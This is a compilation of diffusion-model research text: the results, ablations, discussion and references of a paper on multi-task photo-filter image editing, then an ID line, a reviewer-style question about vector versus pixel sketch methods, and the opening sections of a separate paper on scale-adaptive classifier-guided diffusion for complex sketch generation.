Tab. 1 gives a clear summary of our conditioning. The editing vector \(C\) is passed through a mapping network \(f_\theta\) to get the features, which are in turn passed into the cross-attention layers in the denoising U-Net. The mapping network \(f_\theta\) is realized as two linear layers with an in-between sigmoid linear unit activation. The VQ autoencoder and the denoising U-Net are initialized from a pretrained text-to-image model Rombach et al. (2022). 4 RESULTS 4.1 IMPLEMENTATION DETAILS Datasets. We build upon REalistic and Dynamic Scenes (REDS) Nah et al. (2019) to create a custom dataset for training. REDS contains 300 videos (1280 × 720 resolution), collected for video deblurring and super-resolution tasks. We use a [240-30-30] split for training, validation, and testing, respectively. Each video sequence contains 100 pairs of sharp and blurry frames. To process our custom dataset, we crop a 256 × 256 patch randomly from each pair of frames. As a result, we obtain cropped pairs of {sharp, motion blur} images. We utilize off-the-shelf algorithms to synthesize editing effects for the other tasks. We run the method proposed by Newson et al. (2017) for film grain synthesis. Following Ameur et al. (2022), we generate grain effects for each sharp image at five different radii \{0.010, 0.025, 0.050, 0.075, 0.100\}. We adopt the algorithm proposed by Reinhard et al. (2001) for global color transfer. The color reference image is another sharp image randomly selected from the training set. For the inpainting task, we utilize the algorithm proposed by Yu et al. (2019) to generate free-form masks for each sharp image. Finally, for the sharpening task, we apply the unsharp masking formula Polesel et al. (2000) given a user-defined sharpness intensity and threshold. Please refer to the supplementary document for further implementation details on the generation of our synthetic editing effects. Training. Our model is trained on a single NVIDIA A10 GPU with 24GB RAM, using a batch size of 12 for 45K train steps. At each training step, each sharp image in the batch is randomly labeled with a binary vector “[w/ blur, w/ grain, w/ color transfer, w/ inpainting, w/ sharpening]”, indicating if a given task is on or off. The label vector is randomly drawn from \{[0, 0, 0, 0, 0], [1, 0, 0, 0, 0], [0, 1, 0, 0, 0], [0, 0, 1, 0, 0], [0, 0, 0, 1, 0], [0, 0, 0, 0, 1]\}. Note that the input conditioning is set to zero for each inactive task. For instance, if the color transfer task is off, the color reference image \(I_{ref}\) will be set to zero. If the inpainting task is on, \(I_A\) will be modified by multiplying the free-form mask \(M\). 4.2 QUANTITATIVE EVALUATION Evaluation metrics. We evaluate our approach and baseline methods on image editing using four image metrics: \(\ell_1\) distance, Structural SIMilarity (SSIM) Wang et al. (2004), Learned Perceptual Image Patch Similarity (LPIPS) Zhang et al. (2018a) and Kernel Inception Distance (KID) Binkowski et al. (2018). We run both pixel-level and perceptual metrics in our experiments for a fair comparison. We evaluate the proposed multi-task image-to-image diffusion models on the test set of our custom dataset. We compare our method with a baseline framework derived from Palette++ Saharia et al. (2022a) and a GAN-based method pix2pix Isola et al. (2017). For a fair comparison, we implement Palette++ framework in the latent space of the same pretrained autoencoder, based on the latent diffusion model Rombach et al. (2022), and provide the model with all the additional proposed input conditioning. The input conditioning is a concatenated tensor containing the latent code of the --- 1We refer to this modified version as Palette++. Table 2: Quantitative evaluation on single-task image editing. Results on our test dataset for each task: Blur, grain, color transfer, inpainting, and sharpening. Blue denotes our proposed model. | MODEL | \( \ell_1 \) ERR.↓ | SSIM↑ | LPIPS↓ | KID↓ | |-------------|---------------------|-------|--------|------| | | MOTION BLUR | FILM GRAIN | | pix2pix | 0.052 | 0.898 | 0.202 | 7.239 | 0.088 | 0.843 | 0.248 | 17.502 | | PALETTE++ | 0.062 | 0.880 | 0.198 | 1.855 | 0.058 | 0.886 | 0.104 | 1.728 | | OURS - SINGLE | 0.059 | 0.885 | 0.194 | 1.544 | 0.057 | 0.887 | 0.100 | 1.464 | | OURS - MULT. | 0.061 | 0.881 | 0.194 | 1.854 | 0.058 | 0.886 | 0.104 | 1.765 | | | COLOR TRANSFER | INPAINTING | | pix2pix | 0.236 | 0.647 | 0.426 | 54.206 | 0.080 | 0.916 | 0.261 | 11.312 | | PALETTE++ | 0.074 | 0.908 | 0.094 | 1.369 | 0.075 | 0.860 | 0.128 | 3.203 | | OURS - SINGLE | 0.064 | 0.922 | 0.083 | 1.390 | 0.073 | 0.869 | 0.119 | 1.856 | | OURS - MULT. | 0.074 | 0.908 | 0.093 | 1.385 | 0.076 | 0.857 | 0.130 | 3.391 | | | SHARPENING | | | pix2pix | 0.143 | 0.789 | 0.461 | 29.630 | | PALETTE++ | 0.085 | 0.921 | 0.104 | 1.789 | | OURS - SINGLE | 0.084 | 0.921 | 0.102 | 1.807 | | OURS - MULT. | 0.084 | 0.921 | 0.104 | 1.773 | Table 3: Quantitative evaluation on multi-task image editing. Results on our test dataset for combined tasks: Blur + grain and blur + grain + color transfer. The multi-task editing results of our model trained on single edits (denoted by our - single) are generated by sequentially applying each model. Blue denotes our proposed model. | MODEL | \( \ell_1 \) ERR.↓ | SSIM↑ | LPIPS↓ | KID↓ | |-------------|---------------------|-------|--------|------| | | BLUR + FILM GRAIN | | | pix2pix | 0.103 | 0.861 | 0.354 | 16.775 | | PALETTE++ | 0.074 | 0.803 | 0.099 | 12.257 | | OURS - SINGLE | 0.088 | 0.763 | 0.261 | 10.578 | | OURS - MULT. | 0.073 | 0.815 | 0.246 | 6.829 | | | BLUR + FILM GRAIN + COLOR TRAN. | | pix2pix | 0.541 | 0.139 | 0.754 | 30.458 | | PALETTE++ | 0.194 | 0.608 | 0.434 | 14.214 | | OURS - SINGLE | 0.160 | 0.564 | 0.463 | 38.823 | | OURS - MULT. | 0.142 | 0.697 | 0.373 | 12.421 | | | FILM GRAIN + COLOR TRAN. + GRAIN + COLOR TRAN. + SHARPEN | | pix2pix | 0.438 | 0.303 | 0.598 | 50.473 | 0.562 | 0.111 | 0.855 | 37.482 | | PALETTE++ | 0.134 | 0.753 | 0.293 | 8.261 | 0.206 | 0.642 | 0.355 | 8.992 | | OURS - SINGLE | 0.111 | 0.737 | 0.262 | 15.494 | 0.188 | 0.585 | 0.455 | 54.575 | | OURS - MULT. | 0.107 | 0.799 | 0.232 | 5.149 | 0.151 | 0.742 | 0.315 | 6.695 | Input image, the color reference image downsampled to the latent spatial size, and the editing vector expanded to the latent spatial size. As for pix2pix, we adapt the input conditioning to include all the necessary information. The input conditioning is a concatenated tensor containing the input image, the color reference image, and the editing vector expanded to the same input spatial size. We train all three methods on the same training set for the same number of epochs. **Single-task image-to-image translation.** Tab. 2 reports quantitative evaluation results on each image editing task. We add our model trained on single-task data as an additional baseline for comparison. The model is denoted by “Ours - single” in Tab. 2, where a separate model is trained for each single task and applied independently at inference. Pix2pix performs well on motion blur synthesis but not the other tasks, indicating that the model might be overfitting to a specific task during multi-task training. Our final model trained on multi-task edits performs comparable to Palette++ and “Ours - single”. Thus, our proposed multi-task approach preserves accuracy on single tasks. **Multi-task image-to-image translation.** Tab. 3 reports quantitative evaluation results on multiple image editing tasks. For our model trained on single-task data, we apply each task-specific model sequentially to obtain multi-task edits. Our method outperforms the other three approaches by a large margin. This demonstrates that inserting the conditioning via cross-attention layers promotes disentanglement and helps handle multi-task editing. Note that our model generalizes well to multi-task editing despite only being trained on single tasks. ### 4.3 Qualitative Evaluation **State-of-the-art Comparison.** We compare visually our method with those of Palette++ and pix2pix. Fig. 2 presents image editing results on single tasks, while Fig. 3 shows multi-task image editing results. Pix2pix yields noticeable artifacts under the multi-task training setup. Our method yields comparable or better results for single-task image editing than Palette++. For multi-task image editing, our tasks outperform Palette++, our model trained on single edits, and especially pix2pix, by Figure 2: Qualitative comparison on single-task image editing. Figure 3: Qualitative comparison on multi-task image editing. We evaluate the following combined tasks: blur + grain, blur + grain + color transfer, grain + color transfer, and filmgrain + color transfer + sharpening. a large margin. Fig. 3 shows that our method succeeds in transferring color when three tasks, e.g., blur, grain, and color transfer, are combined altogether. Overall, our method matches the ground truth better. Fine-grained user editing control. Fig. 4 presents fined-grained progressive editing results for single- and multi-task editing. Editing results were attained by progressively increasing the intensity level of the target effect (motion blur, film grain, sharpening) or randomly switching the reference image (color transfer). The bottom row shows that our model can provide fine-grained control in the multi-task setup as well. Please refer to the supplementary document for more comprehensive experiments on single- and multi-task user editing control. Generalization to unseen datasets. Our method also has good generalization capabilities to unseen datasets. Fig. 5 presents single- and multi-task editing results on FFHQ [Karras et al. (2019)] and Stanford Cars [Krause et al. (2013)] datasets, generated by the model trained on our custom dataset. Our model yields plausible editing results for single-task editing, e.g., blur, grain, and sharpening. We also show results on multi-task editing: blur and grain, color transfer and grain, and color transfer, grain, and sharpening. As can be observed from Fig. 5, the same blur degree is given to generate the results in column 2 and 4. Our results show more consistent blur strength compared to those of Palette++ baseline. For the last three columns, the same reference image is given for the color transfer task. Our results show more consistent colorization than Palette++. Figure 4: Fine-grained user control on single- and multi-task editing. Editing results were attained by progressively increasing the intensity level of the target effect (motion blur and film grain), applying various arbitrary inpainting mask regions (inpainting), or randomly switching the reference image (color transfer). Figure 5: Multi-task editing results on unseen dataset. We show single- and multi-task editing results on FFHQ [Karras et al., 2019] and Stanford Cars [Krause et al., 2013] using the model trained on our custom dataset. 4.4 Ablative Analysis Binary task activation labels. The editing vector $C$ consists of the scaling factors $[\beta, \sigma, \lambda, \mu]$ and the binary task labels corresponding to each task’s activation status. Intuitively, these labels might be redundant since they are implicit in the input vector, e.g., blur degree $\beta = 0$ indicates that the motion blur task is disabled. We perform an ablation study to understand their influence on the results, as illustrated in Tab. 4. The binary task activation labels (our approach) slightly improve single-task editing and, by promoting task disentanglement, boost overall performance for multi-task editing. Depth of $f_\theta$. We remark that our architecture’s mapping network $f_\theta$ contains two linear layers. Tab. 4 shows quantitatively that this is an optimal choice for the number of layers. We observe that for the case of editing one single task, using a deeper $f_\theta$ yields slightly better results. As for multi-task editing, a performance drop is observed when increasing layers. Hence, we utilize two layers as a balanced trade-off between single- and multi-task editing. 5 Discussion Limitations. Although our approach yields good editing results on multi-task cases, task disentanglement is not fully achieved. For instance, Fig. 5 shows color transfer results on the three far-right columns. The results on the last two columns (multi-task editing setup) show that the hue intensity slightly differs from that of column 6 (single-task editing setup). This means that the color transfer task is still somewhat entangled with the graining and sharpening tasks. In addition, we notice that our model fails in the inpainting task when performing multi-task editing. The reason may be that all the other four tasks are global editing effects, except inpainting being local editing. Tab. 3 also confirms that multi-task editing obtains higher error metrics than that of single-task editing. Our approach also lacks pixel-wise crispness inherited from the sampling process of diffusion models. At Table 4: Ablation study for architecture choices. Blue denotes our proposed model. | Model | $\ell_1$ ERR.↓ | SSIM↑ | LPIPS↓ | KID↓ | |----------------|----------------|-------|--------|------| | | BLUR | | | | | W/O BINARY LABELS | 0.061 | 0.881 | 0.201 | 2.014| | W/ BINARY LABELS | 0.061 | 0.881 | 0.199 | **1.854** | | $f_\theta - 0 LAYER$ | 0.061 | 0.880 | 0.201 | 2.078| | $f_\theta - 1 LAYER$ | 0.061 | 0.881 | 0.199 | 1.957| | $f_\theta - 2 LAYERS$ | 0.061 | 0.881 | 0.199 | **1.854** | | $f_\theta - 4 LAYERS$ | 0.061 | 0.882 | 0.198 | **1.818** | | | BLUR + GRAIN = COLOR | |----------------|----------------------| | W/O BINARY LABELS | 0.240 | 0.581 | 0.443 | 17.639 | | W/ BINARY LABELS | 0.142 | **0.697** | **0.373** | **12.421** | | $f_\theta - 0 LAYER$ | 0.198 | 0.621 | 0.374 | 14.620 | | $f_\theta - 1 LAYER$ | 0.165 | 0.657 | **0.369** | **12.046** | | $f_\theta - 2 LAYERS$ | 0.142 | **0.697** | 0.373 | 12.421 | | $f_\theta - 4 LAYERS$ | 0.152 | 0.650 | 0.413 | 20.718 | Table 5: Quantitative evaluation on contrastive learning (N-pair loss). Blue denotes our proposed model. Config A and B refer to the contrastive N-pair loss applied to bottleneck features and label features, respectively. | Model | $\ell_1$ ERR.↓ | SSIM↑ | LPIPS↓ | KID↓ | |----------------|----------------|-------|--------|------| | | BLUR | | | | | + N-PAIR - CONFIG A | 0.062 | 0.877 | 0.205 | 2.348| | + N-PAIR - CONFIG B | 0.062 | 0.880 | 0.200 | 1.923| | OURS - MULT. | **0.061** | **0.881** | **0.199** | **1.854** | | | BLUR + FILM GRAIN | | + N-PAIR - CONFIG A | 0.073 | 0.798 | 0.277 | 10.662| | + N-PAIR - CONFIG B | 0.088 | 0.738 | 0.366 | 43.615| | OURS - MULT. | **0.073** | **0.815** | **0.246** | **6.829** | | | BLUR + FILM GRAIN + COLOR TRAN. | |----------------|----------------------------------| | + N-PAIR - CONFIG A | 0.058 | 0.885 | 0.107 | 2.236 | | + N-PAIR - CONFIG B | 0.057 | **0.891** | 0.120 | 1.851 | | OURS - MULT. | 0.058 | 0.886 | **0.104** | **1.765** | Each sampling step, slight errors are accumulated, resulting in inaccuracies in the synthesized output. Alternative image editing methods have been proposed for inverting existing high-quality images to the latent space of diffusion models [Dhariwal & Nichol (2021); Song et al. (2022a); Mokady et al. (2023)]. We have tried DDIM inversion [Dhariwal & Nichol (2021)] to obtain the initial noise features from an input image. However, we observe that the obtained noise features are more difficult to edit than random initialized noise features, thus resulting in worse image quality. Please refer to the supplementary for qualitative results. Disentanglement. We have explored different constraints to enhance feature disentanglement for multi-task editing. We have tried different contrastive learning approaches. In particular, we adopted the N-pair loss used in [Aksoy et al. (2018)], where the loss function is defined as: $$L_{N-pair} = \frac{1}{|\mathcal{P}|} \sum_{p,q \in \mathcal{P}} I[l_p = l_q] \log \left( \frac{1 + \exp(\|f_p - f_q\|)}{2} \right) + I[l_p \neq l_q] \log \left( 1 + \exp(-\|f_p - f_q\|)/2 \right).$$ This N-pair loss is applied within each batch, where $\mathcal{P}$ denotes the batch of samples, $l_p$ refers to the binary task activation vector of sample $p$, and $f_p$ are the corresponding features. Here, $I[\cdot]$ returns 1 if the condition is true; 0 otherwise. We added the N-pair loss to the training objective in our experiments to enhance disentanglement. As for the choice of $f_p$, we have tested both the bottleneck features of the denoising U-Net and the label features $f_\theta(C)$. However, the results in Tab. 5 show that there is no noticeable improvements to the baseline on single-task edits, and even a drop in performance on multi-task edits. Please refer to the supplementary for further analysis. 6 CONCLUSION We demonstrated that multi-task diffusion models can be effective in learning image representations for various photo filter effects, such as motion blur, film graining, sharpening, colorization, and image inpainting. In particular, it is shown that the learned representation enables novel domain generalization towards unseen data distributions and more fine-grained control over generated images, even when it is trained on individual tasks. We achieve this by introducing the binary task activation vector and the cross-attention operations across given input tasks into the proposed conditional diffusion probabilistic formulation. Also, our formulation leads to improved performance in extensive evaluations and comparisons against the state-of-the-art multi-task image editing methods. Task-level feature disentanglements still remain challenging and an interesting research direction. We believe that there will be more advanced solutions for improved task disentanglement, such as task batch scheduling and/or sophisticated contrastive losses, in the future. REFERENCES Yağız Aksoy, Tae-Hyun Oh, Sylvain Paris, Marc Pollefeys, and Wojciech Matusik. Semantic soft segmentation. *ACM TOG*, 37(4):1–13, 2018. Zoubida Ameur, Wassim Hamidouche, Edouard François, Miloš Radosavljević, Daniel Menard, and Claire-Hélène Demarty. Deep-based film grain removal and synthesis. *arXiv preprint arXiv:2206.07411*, 2022. Zoubida Ameur, Wassim Hamidouche, Edouard François, Miloš Radosavljević, Daniel Menard, and Claire-Hélène Demarty. Deep-based film grain removal and synthesis. *IEEE Transactions on Image Processing*, 2023. Omri Avrahami, Dani Lischinski, and Ohad Fried. Blended diffusion for text-driven editing of natural images. In *CVPR*, pp. 18208–18218, 2022. Mikolaj Binkowski, Danica J. Sutherland, Michael Arbel, and Arthur Gretton. Demystifying MMD gans. In *ICLR*. OpenReview.net, 2018. Andrew Brock, Jeff Donahue, and Karen Simonyan. Large scale gan training for high fidelity natural image synthesis. *arXiv preprint arXiv:1809.11096*, 2018. Tim Brooks, Aleksander Holynski, and Alexei A Efros. Instructpix2pix: Learning to follow image editing instructions. In *CVPR*, pp. 18392–18402, 2023. Yunjey Choi, Minje Choi, Munyoung Kim, Jung-Woo Ha, Sunghun Kim, and Jaegul Choo. Stargan: Unified generative adversarial networks for multi-domain image-to-image translation. In *CVPR*, pp. 8789–8797, 2018. Yunjey Choi, Youngjung Uh, Jaejun Yoo, and Jung-Woo Ha. Stargan v2: Diverse image synthesis for multiple domains. In *CVPR*, pp. 8188–8197, 2020. Antonia Creswell, Tom White, Vincent Dumoulin, Kai Arulkumaran, Biswa Sengupta, and Anil A. Bharath. Generative adversarial networks: An overview. *IEEE Signal Processing Magazine*, 35(1):53–65, 2018. doi: 10.1109/MSP.2017.2765202. Jacob Devlin, Ming-Wei Chang, Kenton Lee, and Kristina Toutanova. Bert: Pre-training of deep bidirectional transformers for language understanding. *arXiv preprint arXiv:1810.04805*, 2018. Prafulla Dhariwal and Alexander Nichol. Diffusion models beat gans on image synthesis. *NeurIPS*, 34: 8780–8794, 2021. Ian Goodfellow, Jean Pouget-Abadie, Mehdi Mirza, Bing Xu, David Warde-Farley, Sherjil Ozair, Aaron Courville, and Yoshua Bengio. Generative adversarial nets. *NeurIPS*, 27, 2014. Amir Hertz, Ron Mokady, Jay Tenenbaum, Kfir Aberman, Yael Pritch, and Daniel Cohen-Or. Prompt-to-prompt image editing with cross attention control. *arXiv preprint arXiv:2208.01626*, 2022. Jonathan Ho and Tim Salimans. Classifier-free diffusion guidance. *arXiv preprint arXiv:2207.12598*, 2022. Jonathan Ho, Ajay Jain, and Pieter Abbeel. Denoising diffusion probabilistic models. In *NeurIPS*, 2020. Jonathan Ho, Chitwan Saharia, William Chan, David J Fleet, Mohammad Norouzi, and Tim Salimans. Cascaded diffusion models for high fidelity image generation. *The Journal of Machine Learning Research*, 23(1): 2249–2281, 2022. Phillip Isola, Jun-Yan Zhu, Tinghui Zhou, and Alexei A Efros. Image-to-image translation with conditional adversarial networks. In *CVPR*, pp. 1125–1134, 2017. Zahra Kadkhodaie and Eero P Simoncelli. Stochastic solutions for linear inverse problems using the prior implicit in a denoiser. In A. Beygelzimer, Y. Dauphin, P. Liang, and J. Wortman Vaughan (eds.), *NeurIPS*, 2021. URL: https://openreview.net/forum?id=x5hh6N9bUUb Tero Karras, Samuli Laine, and Timo Aila. A style-based generator architecture for generative adversarial networks. In *CVPR*, pp. 4401–4410, 2019. Bahjat Kawar, Michael Elad, Stefano Ermon, and Jiaming Song. Denoising diffusion restoration models. *arXiv preprint arXiv:2201.11793*, 2022a. Bahjat Kawar, Roy Ganz, and Michael Elad. Enhancing diffusion-based image synthesis with robust classifier guidance. *arXiv preprint arXiv:2208.08664*, 2022b.
5xadJmgwix
The authors mentioned that vector-base approaches are inherently limited when tackling intricate and complex sketches. I would like to understand why pixel-based methods have an advantage over vector-based methods? I hope the authors can provide some intuitive explanations.
SCALE-ADAPTIVE DIFFUSION MODEL FOR COMPLEX SKETCH SYNTHESIS Jijin Hu\textsuperscript{1} Ke Li\textsuperscript{1*} Yonggang Qi\textsuperscript{1} Yi-Zhe Song\textsuperscript{2} \textsuperscript{1}Beijing University of Posts and Telecommunications, CN \textsuperscript{2}SketchX, CVSSP, University of Surrey, UK {jijinhu,like1990,qiyg}@bupt.edu.cn [email protected] ABSTRACT While diffusion models have revolutionized generative AI, their application to human sketch generation, especially in the creation of complex yet concise and recognizable sketches, remains largely unexplored. Existing efforts have primarily focused on vector-based sketches, limiting their ability to handle intricate sketch data. This paper introduces an innovative extension of diffusion models to pixel-level sketch generation, addressing the challenge of dynamically optimizing the guidance scale for classifier-guided diffusion. Our approach achieves a delicate balance between recognizability and complexity in generated sketches through scale-adaptive classifier-guided diffusion models, a scaling indicator, and the concept of a residual sketch. We also propose a three-phase sampling strategy to enhance sketch diversity and quality. Experiments on the QuickDraw dataset showcase the potential of diffusion models to push the boundaries of sketch generation, particularly in complex scenarios unattainable by vector-based methods. 1 INTRODUCTION The field of diffusion models (Ho et al., 2020; Song et al., 2020a,b; Dhariwal & Nichol, 2021; Ho & Salimans, 2021) has seen remarkable progress, pushing the boundaries of generative AI and enabling the generation of high-quality images across diverse domains (Meng et al., 2021; Choi et al., 2021; Rombach et al., 2022; Poole et al., 2022; Wang et al., 2023). However, this surge of advancements has largely overlooked the unique challenge posed by human sketch generation—a task demanding the creation of complex sketches that maintain a delicate balance between conciseness and recognizability. Recent endeavors in this direction have predominantly centered on vector-based sketches (Ha & Eck, 2018; Chen et al., 2017; Zang et al., 2021). Unfortunately, these vector-based approaches, while suitable for simpler sketches, grapple with inherent limitations when tackling intricate and complex sketch data (Das et al., 2022; Wang et al., 2022). In this paper, we embark on an ambitious endeavor to harness the full potential of diffusion models by extending their capabilities into the realm of pixel-based sketch generation. Our overarching goal is to demonstrate their prowess in generating complex sketches that strike the perfect balance—concise yet highly recognizable. Determining the appropriate level of complexity in sketch generation has long been considered a formidable challenge, primarily due to the inherent variability in line structures within sketches. To address this challenge, we adapt a conventional classifier-guided pipeline (Dhariwal & Nichol, 2021) designed specifically for sketch generation. However, this transition is not without its difficulties, as we quickly encounter a significant hurdle: the conventional designs, meticulously fine-tuned for photo generation, do not seamlessly transfer to the intricate realm of sketch creation (as illustrated in Figure 1). As we delve deeper into this problem space, we uncover a compelling revelation—one that diverges from the well-established principles governing photography. In the realm of photos, higher scale values often correlate with increased fidelity (Dhariwal & Nichol, 2021; Ho & Salimans, 2021). However, in the context of sketch generation, we encounter a fascinating phenomenon that we term “over-sketching” (as depicted in Figure 1(a)). When working with larger scale values, we witness the emergence of repetitive strokes, overlaying previously rendered lines and ultimately compromising the quality of the generated sketches. Addressing this issue proves challenging, as there exists *Correspondence to: Ke Li ([email protected]). Code to be found at GitHub page Figure 1: (a) Vanilla constant scale classifier guided sketch sampling suffers from either insufficient recognizability or over-sketching. In addition, there is no universal scale that is suitable for all categories. (b) Sketches generated by our model are highly recognizable and more visually appealing. no universal scale choice suitable for diverse sketch categories. Moreover, adopting smaller scales may result in insufficient recognizability, a trade-off that is also undesirable. Our paramount contribution, therefore, revolves around the development of a specialized classifier-guided diffusion model meticulously crafted for the domain of sketches. At its core, our model introduces a dynamic sampling scale selector. This selector grapples with the intricate task of determining the optimal scale for each distinct sketch while ingeniously sidestepping the issue of over-sketching. This delicate equilibrium ensures that our generated sketches strike the perfect harmony between recognizability and complexity. This strategy pivots around two integral components that work in tandem: a scaling indicator and a residual sketch. The residual sketch offers us a nuanced perspective on the influence of classifier guidance by tracking how the generated sketch evolves, pixel by pixel, under varying scale choices. This empowers us to pinpoint the scale where the residual sketch best aligns with the scaling indicator, thereby optimizing the entire generation process. To further elevate the quality of our generated sketches, we introduce two supplementary design elements. Firstly, we demonstrate the effectiveness of commencing the generation process with a few unconditional sampling steps. This initial phase allows the rough structure of the sketch to take form, amplifying the diversity of the generated sketches by maximizing mode coverage. Secondly, we address the gradual attenuation of classifier gradients as the sampling deepens. To counteract this, we strategically implement an early-stop mechanism within our scale adaptive sampling. This seamless transition back to unconditional denoising accelerates the process while concurrently refining the generation results by eliminating noisy pixels. Our contributions can be summarized as follows: (i) We introduce scale adaptive classifier-guided diffusion models tailored for pixel-based sketch generation, replacing the conventional fixed gradient scale approach and achieving high-quality sketch generation. (ii) We present a novel scaling indicator that optimizes classifier guidance based on recognizability and complexity, complemented by the innovative concept of the residual sketch, enabling fine-tuned control of the generation process in raw pixel space for improved sketch quality. (iii) Our three-phase sampling strategy, comprising shape and structure construction, scale adaptive sampling for class-specific sketches, and denoising, significantly enhances sample diversity and quality by removing background clutter. These contributions collectively advance the state-of-the-art in sketch generation with diffusion models. 2 RELATED WORK Sketch Generation. Synthesizing human sketches is an appealing task that increasingly received attention in recent years. Early studies (Song et al., 2018; Wang et al., 2018; Li et al., 2019b; Yu et al., 2020) and more recent arts (Chan et al., 2022; Wan et al., 2022) focused on the problem of image-to-sketch generation, to help understand and mimic how humans perceive and represent the visual world using sketches. Another line of work is however concentrating on how to better capture the sequential features in human sketches within the single domain, involving RNN-based (Ha & Eck, 2018; Su et al., 2020; Chen et al., 2017), GAN-based (Ge et al., 2020; Liu et al., 2019), and Graph-based (Xu et al., 2021; Yang et al., 2021b) approaches. These models typically adopt a sequence decoder, i.e., LSTM or Transformer, to explicitly capture the geometric structure of the sequential points represented in coordinates or parametric Bézier curve (Das et al., 2020). As a result, the sketch generation is formed as an autoregressive process. Most recently, diffusion models (Das et al., 2022; Wang et al., 2022) are leveraged to directly learn the distribution of points’ coordinates in a non-autoregressive manner, thereby advancing in generating complex sketches. Instead of using the sequential representation of stroke points, we seek to train diffusion models on the raster sketches composed of pixel grids to generate high-quality sketches. An additional property of pixel-based diffusion modeling is that the classifier gradients (Dhariwal & Nichol, 2021) can be conveniently applied as guidance without retraining the unconditional diffusion models or extra differentiable rasterization rendering. **Guided Diffusion Models.** There is a large body of literature on controllable generation using diffusion models. The pioneering work ADM (Dhariwal & Nichol, 2021) allows image generation conditioned on a class label by adding the classifier gradients to the frozen unconditional trained diffusion. Later, a Classifier-free approach (Ho & Salimans, 2021) is importantly proposed to avoid separately training the classifier while achieving similar sample quality, thereby triggering plenty of work on text-conditional image synthesis, e.g., Stable Diffusion (Rombach et al., 2022), DALL-E 2 (Ramesh et al., 2022), GLIDE (Nichol et al., 2022) and Imagen (Saharia et al., 2022) to name a few. More broadly, latest works expand the scope of conditions to different modalities via cross-attention or adapter with CLIP, such as segmentation mask (Gafni et al., 2022), sketch (Voynov et al., 2023), and many others (Zhang & Agrawala, 2023; Mou et al., 2023). Our work is different from previous works in that the strength of the classifier guidance is dynamically determined to manage the line complexity, to improve the realism of produced sketches. ### 3 BACKGROUND On a high level, diffusion models can sample data from a simple Gaussian distribution by reversing noisy data gradually in multiple steps. It typically consists of two inverse processes, i.e., the forward for diffusion and the backward for denoising. **Diffusion and Denoising** The forward process is a predefined diffusion process \( q \), which gradually adds Gaussian noise to a real image \( x_0 \), resulting noisier versions \( x_{1:T} \). It is formally defined as \( q(x_t|x_{t-1}) = N(x_t; \sqrt{1 - \beta_t}x_{t-1}, \beta_t I) \), where \( 0 < \beta_t < 1, t = 1 \ldots T \) is a predefined variance schedule to specify the noise levels of \( x_t \). The backward process is a denoising function \( p_\theta \), where a neural network is trained to produce slightly clearer data \( x_{t-1} \) from \( x_t \) at each timestep. Given \( p_\theta \), we can sample from pure noise \( x_T \) and sequentially produce samples \( x_{T-1}, x_{T-2}, \ldots \) until reaching \( x_0 \), i.e., a produced sample. **Learning Objective** As the backward process is also formulated as a Gaussian, i.e., \( p_\theta(x_{t-1}|x_t) = N(x_{t-1}; \mu_\theta(x_t, t), \Sigma_\theta(x_t, t)) \), where the mean and variance of the Gaussian are parameterized by \( \mu_\theta \) and \( \Sigma_\theta \), respectively. DDPM (Ho et al., 2020) show that the variance can be set to time-dependent constant, i.e., \( \Sigma_\theta(x_t, t) = \sigma_t^2 I \), the mean \( \mu_\theta(x_t, t) \) is then reparametrized by a noise approximator \( \epsilon_\theta \) since we have \( \mu_\theta(x_t, t) = 1/\sqrt{\alpha_t} \cdot (x_t - \beta_t/\sqrt{1-\alpha_t}\epsilon_\theta(x_t, t)) \), where \( \alpha_t = 1 - \beta_t \) and \( \tilde{\alpha}_t := \prod_{s=1}^{t} \alpha_s \). Consequently, an alternative training objective \( ||\epsilon_\theta(x_t, t) - \epsilon||^2 \), i.e., MSE loss between the true and the estimated noise, is derived for training the diffusion models. **Classifier-guided Sampling** To generate data conditioned on class labels, a classifier \( p_\phi(y|x_t) \) can be trained on noisy data \( x_t \). Then the gradient of the classifier, i.e., \( \nabla_{x_t} \log p_\phi(y|x_t) \), is leveraged to guide the sampling. Specifically, the predicted noise after classifier guidance is: \[ \hat{\epsilon} = \epsilon_\theta(x_t, t) - s \cdot \sqrt{1 - \tilde{\alpha}_t} \nabla_{x_t} \log p_\phi(y|x_t) \] where \( s \) is a gradient scale predefined manually. Then the class conditional sampling is achieved by replacing \( \epsilon_\theta \) with \( \hat{\epsilon} \). It turns out that the scaling factor \( s \) has a significant impact on the generated data, and increasing \( s \) will typically trade off the diversity for fidelity (Ho & Salimans, 2021). ### 4 METHODOLOGY Our goal is to generate new sketches in pixel format conditioned on class labels using the learned denoising function, i.e., \( p_\theta(x_{t-1}|x_t, y) \), using DDIM sampler (see Appendix A for more details Figure 2: Schematic overview of our pixel-level sketch generator. There are three sampling phases, i.e., warm-up sampling (phase #1), scale adaptive classifier-guided sampling (phase #2), and end-up denoising (phase #3). Core to our framework is phase #2 which can adaptively select an optimal classifier guidance scale $s$ to encourage better recognizability and avoid over-sketching, thereby boosting the sample quality. Essentially, the scale is dynamically determined by matching a scale indicator and residual sketches at each sampling step. The scale indicator is to signal the demand for classifier guidance by predicting the final generation results $x_{0|t}$. The residual sketch measures whether the chosen scale could activate proper guidance as the indicator suggests. about DDIM sampling) under the guidance of classifier gradients as described above. Particularly, an adaptive scaling strategy is devised to dynamically determine the level of the gradient scale at each time step to improve the quality of the produced sketches. A schematic overview of our model is shown in Figure 2. Details are described in the following. 4.1 SCALE ADAPTIVE CLASSIFIER-GUIDED SAMPLING Following the standard pipeline for handling natural images, we first train a DDPM using sketch images, i.e., $x_0 \in \mathbb{R}^{H \times W \times 3}$. During generation, as shown in Figure 1, a constant value of the scale $s$ in Eq. (1) will lead to sub-optimal quality of the produced sketches, suffering from either insufficient recognizability or over-sketching. Therefore, a scale adaptive sampling strategy is developed to overcome the above issues. Specifically, for each intermediate sampling step $t$, a scaling indicator is used to penalize the guidance strength when the complexity and recognizability of the expected produced sketch $x_{0|t}$ are already sufficiently high. A residual sketch image $x_{r,s}$ is then to explicitly measure the impact of any gradient scale, by leveraging the visual difference of $x_{0|t}$ before and after performing the guidance. Then the scale is optimized by using a differentiable matching module to encourage the residual sketch to conform to the scaling indicator, thereby steering the generation accordingly. In the following, we will formally define each key module. **Scaling Indicator.** High recognizability and proper complexity are two crucial properties to make the produced sketches informative and visually appealing. Therefore, we empirically define a scaling indicator by combining these two factors: $$\varsigma(x_t) = \gamma \cdot \exp(\alpha \cdot (1 - c(x_{0|t})) - \beta \cdot f(x_{0|t})), \quad (2)$$ where $x_{0|t} = (x_t - \sqrt{1 - \bar{\alpha}_t} \cdot \epsilon_\theta(x_t, t))/\sqrt{\bar{\alpha}_t}$, 